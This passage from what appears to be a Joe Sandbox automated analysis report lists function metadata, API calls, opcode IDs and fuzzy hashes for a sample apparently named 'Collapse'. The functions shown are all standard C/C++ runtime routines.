                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _strrchr
                                                                                                        • String ID:
                                                                                                        • API String ID: 3213747228-0
                                                                                                        • Opcode ID: 76cd254f3b8e765761cdde82e3165a3a1630fbfe1fb7a850d07f14f5abbed5a0
                                                                                                        • Instruction ID: 81ef36e20875f5403fa0f7070a2c98e810a27488b0afc8a6282566bf31dad5ca
                                                                                                        • Opcode Fuzzy Hash: 76cd254f3b8e765761cdde82e3165a3a1630fbfe1fb7a850d07f14f5abbed5a0
                                                                                                        • Instruction Fuzzy Hash: 64B15A72A063559FEF11CFACCCC2BBEBBA9EFA5350F144555E405AF282D2749901C7A0
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0098F827
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0098F82F
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0098F8B8
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0098F8E3
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 0098F938
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm
                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                        • Opcode ID: e719a19282537467e7755e2694b4a5044b5ec889a3831c46bd26a006b7646922
                                                                                                        • Instruction ID: e25478954a0a9c72850df9f1c6f8c689f4f09d8323a23c5e162c1c3a3d0a08c8
                                                                                                        • Opcode Fuzzy Hash: e719a19282537467e7755e2694b4a5044b5ec889a3831c46bd26a006b7646922
                                                                                                        • Instruction Fuzzy Hash: B941E731E00218ABCF10EF68C894B9E7BB5EF85324F148165E815AB392D735DE15CBD1
                                                                                                        APIs
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,0099BE51,009835D2,?,00000000,?), ref: 0099BE03
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeLibrary
                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                        • API String ID: 3664257935-537541572
                                                                                                        • Opcode ID: caea27f6a9aebc3339d813ff974f22182cdcb416de1ac38aecd0fb485d08f3a6
                                                                                                        • Instruction ID: e7b3348feb83d847b4abc2b2069e35d7a79e304c6e8222e503201e61715736ee
                                                                                                        • Opcode Fuzzy Hash: caea27f6a9aebc3339d813ff974f22182cdcb416de1ac38aecd0fb485d08f3a6
                                                                                                        • Instruction Fuzzy Hash: 362105B1A09224A7CF219B6DFE41B9B375C9F417B0F250220E916A72D1DB38ED00D6D0
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0098EB22
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 0098EB30
                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 0098EB41
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                        • API String ID: 667068680-1047828073
                                                                                                        • Opcode ID: cc01cb2807f8ca4750c4430e87a260093e93099c25ede77a43225ca059908ae4
                                                                                                        • Instruction ID: a372d591b16d7acf07398ca0ac43e76616d7eed101e2be2328d3500459b3719f
                                                                                                        • Opcode Fuzzy Hash: cc01cb2807f8ca4750c4430e87a260093e93099c25ede77a43225ca059908ae4
                                                                                                        • Instruction Fuzzy Hash: C7D09E355AD3206F8700ABB0BE4A8D67E94EF856393054755F501D2561D7B44940AB94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f7f7578a7da2f4e13e7039ea09bb6f49e613395e29d8fb84c21ef5497dd63ea7
                                                                                                        • Instruction ID: 111531af8752034f70e11d5942893829c646e9e041673dcc04e9852440ccd37e
                                                                                                        • Opcode Fuzzy Hash: f7f7578a7da2f4e13e7039ea09bb6f49e613395e29d8fb84c21ef5497dd63ea7
                                                                                                        • Instruction Fuzzy Hash: 7CB1D5B0A08249AFDF15EFA8C841BAF7BB5FF96310F144158E404A72D2DB759941CBE0
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,00999AEB,0098F5BA,0098E585), ref: 00999B02
                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00999B10
                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00999B29
                                                                                                        • SetLastError.KERNEL32(00000000,00999AEB,0098F5BA,0098E585), ref: 00999B7B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                        • String ID:
                                                                                                        • API String ID: 3852720340-0
                                                                                                        • Opcode ID: 4611bd4eb6c2a04d6712414935bb6248391a38ff70cc9ca7c5533e03a57e7ea9
                                                                                                        • Instruction ID: 65b578025da502ab14654a3f549d28d92a0ce4e6e4376b5091281cab77f8d9ab
                                                                                                        • Opcode Fuzzy Hash: 4611bd4eb6c2a04d6712414935bb6248391a38ff70cc9ca7c5533e03a57e7ea9
                                                                                                        • Instruction Fuzzy Hash: C401D83222DA116EAE242FFCBD86B1B2A5CEB56775721032EF521755F2EE195C00B190
                                                                                                        APIs
                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 0099A4DB
                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 0099A754
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallUnexpectedtype_info::operator==
                                                                                                        • String ID: csm$csm$csm
                                                                                                        • API String ID: 2673424686-393685449
                                                                                                        • Opcode ID: 7465d04e73da00f9c4388f8c20228908be7ba01cb8015c6fc83e1bed186b2290
                                                                                                        • Instruction ID: 6027dc37abb9893c490cb3dac553a0d8d3b1f0b65c7e852bf4e68132ef6b5d5e
                                                                                                        • Opcode Fuzzy Hash: 7465d04e73da00f9c4388f8c20228908be7ba01cb8015c6fc83e1bed186b2290
                                                                                                        • Instruction Fuzzy Hash: A5B18671800209EFCF14DFADC885AAEBBB9FF54310F18456AE8056B222D735DA51CBD2
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,009AB3E5,000000FF,?,00994B4A,00994A31,?,00994BE6,00000000), ref: 00994ABE
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,009AB3E5,000000FF,?,00994B4A,00994A31,?,00994BE6,00000000), ref: 00994AD0
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,009AB3E5,000000FF,?,00994B4A,00994A31,?,00994BE6,00000000), ref: 00994AF2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: 8e53789be631367d772b0ce1088f3c325d6efd68736868c6b740339f047b596a
                                                                                                        • Instruction ID: a8b44951823fadd13a04fd14b341a8dc38c8c67dcb4ea44a36a0825987f897ec
                                                                                                        • Opcode Fuzzy Hash: 8e53789be631367d772b0ce1088f3c325d6efd68736868c6b740339f047b596a
                                                                                                        • Instruction Fuzzy Hash: 5B01A735998615AFCB129F84DD05FAF7BFCFB44B25F000629F821A2690DB749900DA94
                                                                                                        APIs
                                                                                                        • __alloca_probe_16.LIBCMT ref: 0099C59B
                                                                                                        • __alloca_probe_16.LIBCMT ref: 0099C664
                                                                                                        • __freea.LIBCMT ref: 0099C6CB
                                                                                                          • Part of subcall function 0099AD61: HeapAlloc.KERNEL32(00000000,?,?,?,0098B9E5,?,?,009835D2,00001000,?,0098351A), ref: 0099AD93
                                                                                                        • __freea.LIBCMT ref: 0099C6DE
                                                                                                        • __freea.LIBCMT ref: 0099C6EB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1096550386-0
                                                                                                        • Opcode ID: 1390140f15e32be261f4c1b850a9b086c326aaac362bde971ed526a86ccb06c7
                                                                                                        • Instruction ID: f6951f076a2eead8a6e3b9ee65bd5e9b77cb2c79d7d888a989944c0ae8b87a9c
                                                                                                        • Opcode Fuzzy Hash: 1390140f15e32be261f4c1b850a9b086c326aaac362bde971ed526a86ccb06c7
                                                                                                        • Instruction Fuzzy Hash: 8251AFB2600247AFEF21AF68DC81EBB7AADEF98710B15052AFC05D7151EB75DD108660
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandleSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 3849164406-0
                                                                                                        • Opcode ID: 9a21729335cd2d85580ddf745aa5b0e3cda2bea131c0550d15b7974e35dbf5cd
                                                                                                        • Instruction ID: 1133a2cb3c91c0bda31fd3a38476e2650099663281f611f60b24729ec5f1ed97
                                                                                                        • Opcode Fuzzy Hash: 9a21729335cd2d85580ddf745aa5b0e3cda2bea131c0550d15b7974e35dbf5cd
                                                                                                        • Instruction Fuzzy Hash: CA71B1B0D08258CFCB04EFA8D58979DBBF4BF48314F10892AE499AB351D735A945CF52
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32(009B6898,?,00000000,009AB3C8,000000FF,?,0098B697), ref: 0098E8FB
                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,00000000,009AB3C8,000000FF,?,0098B697), ref: 0098E91A
                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,009AB3C8,000000FF,?,0098B697), ref: 0098E948
                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,009AB3C8,000000FF,?,0098B697), ref: 0098E9A3
                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,009AB3C8,000000FF,?,0098B697), ref: 0098E9BA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 66001078-0
                                                                                                        • Opcode ID: 6c430f17a97a5c3a9b2a58371b0260efed24c1abe7b362f6451fc0f0ed486dae
                                                                                                        • Instruction ID: d454df10600a9ba5605f85dd8bb158d7fd970158a5afcf5526bf0047c6d5363b
                                                                                                        • Opcode Fuzzy Hash: 6c430f17a97a5c3a9b2a58371b0260efed24c1abe7b362f6451fc0f0ed486dae
                                                                                                        • Instruction Fuzzy Hash: 97416B31504606DFCB64EF65C5A5A6AB3F8FF08360B204A2AE456D7740E7B2F984CB51
                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 0098C05B
                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0098C066
                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0098C0D4
                                                                                                          • Part of subcall function 0098BF5D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0098BF75
                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 0098C081
                                                                                                        • _Yarn.LIBCPMT ref: 0098C097
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                        • String ID:
                                                                                                        • API String ID: 1088826258-0
                                                                                                        • Opcode ID: 3156da1573939fa9d5283d58178ecf28b46f57b2a989d260ff91191e59377121
                                                                                                        • Instruction ID: 3dfaab01e6112c17cb12dd9c3865c01c2dec6459072f08190ac283027d10f1a2
                                                                                                        • Opcode Fuzzy Hash: 3156da1573939fa9d5283d58178ecf28b46f57b2a989d260ff91191e59377121
                                                                                                        • Instruction Fuzzy Hash: 4E019AB5A04510DBCB06FB20895567D7BA1BBC5760B190248E816573C2CF34AA42DBD1
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,009A535D,00000000,?,009B8180,?,?,?,009A5294,00000004,InitializeCriticalSectionEx,009AF434,009AF43C), ref: 009A52CE
                                                                                                        • GetLastError.KERNEL32(?,009A535D,00000000,?,009B8180,?,?,?,009A5294,00000004,InitializeCriticalSectionEx,009AF434,009AF43C,00000000,?,0099AA0C), ref: 009A52D8
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 009A5300
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                        • String ID: api-ms-
                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                        • Opcode ID: 95c08a5a8a4ae53471fde5aacabd4840b154ab056a2e6fc1ae26fd815678e37f
                                                                                                        • Instruction ID: b631dec8986c25a5ffdc2f3b700d4363554bf8e6ae6755e9cbc717c1573e30fe
                                                                                                        • Opcode Fuzzy Hash: 95c08a5a8a4ae53471fde5aacabd4840b154ab056a2e6fc1ae26fd815678e37f
                                                                                                        • Instruction Fuzzy Hash: FBE04F303C4305F7EF201B61EE06B5D3E59AB51FA5F104030FA0DE84E2DBE1E810A584
                                                                                                        APIs
                                                                                                        • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 009A3122
                                                                                                          • Part of subcall function 0099AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0099C6C1,?,00000000,-00000008), ref: 0099AED2
                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 009A3374
                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009A33BA
                                                                                                        • GetLastError.KERNEL32 ref: 009A345D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 2112829910-0
                                                                                                        • Opcode ID: b4246c30507a95fa88bc0a949893937b81a1a45c82c637971f79226c54e093f2
                                                                                                        • Instruction ID: b50437223bafdd3906330003218e29de17960fd73ef84d79f9143cc1f02fb48a
                                                                                                        • Opcode Fuzzy Hash: b4246c30507a95fa88bc0a949893937b81a1a45c82c637971f79226c54e093f2
                                                                                                        • Instruction Fuzzy Hash: 7ED15C75D082499FCF15CFE8D880AADBBF9FF4A310F14856AE425EB251D730AA41CB90
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AdjustPointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1740715915-0
                                                                                                        • Opcode ID: 3914424ea3e0075fc024e9bc66cc5026925c212f3a03326f6cc4a61ad663bb83
                                                                                                        • Instruction ID: 84c92c5003560df337c16edc5c5aae87f00e92397e72f5e207ac6ad32c0bc5ca
                                                                                                        • Opcode Fuzzy Hash: 3914424ea3e0075fc024e9bc66cc5026925c212f3a03326f6cc4a61ad663bb83
                                                                                                        • Instruction Fuzzy Hash: 9E51D1726042069FDF259F58D845B7A77A8FF54710F14452DE826472A1E732ED80CBD2
                                                                                                        APIs
                                                                                                          • Part of subcall function 0099AE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0099C6C1,?,00000000,-00000008), ref: 0099AED2
                                                                                                        • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 009A0BEA
                                                                                                        • __dosmaperr.LIBCMT ref: 009A0BF1
                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 009A0C2B
                                                                                                        • __dosmaperr.LIBCMT ref: 009A0C32
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.1244153360.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.1244136409.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244178118.00000000009AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244199649.00000000009B6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244221538.00000000009BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.1244238747.00000000009BC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_980000_Collapse.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                        • String ID:
                                                                                                        • API String ID: 1913693674-0
                                                                                                        • Opcode ID: d4e68fa112bc4c1d6e50a50f4e53ca781b258e948aede1c04be178deb44704ee
                                                                                                        • Instruction ID: b4f055e16eaacd13e1254c0bab7e5d257db9b3e65e8221a95fea928390b59c1b
                                                                                                        • Opcode Fuzzy Hash: d4e68fa112bc4c1d6e50a50f4e53ca781b258e948aede1c04be178deb44704ee
                                                                                                        • Instruction Fuzzy Hash: 0921C571604215AF9F10AF65C885A6BB7ACFFC63747104A28F899D7251E731EC1097E0
                                                                                                        Memory Dump Source
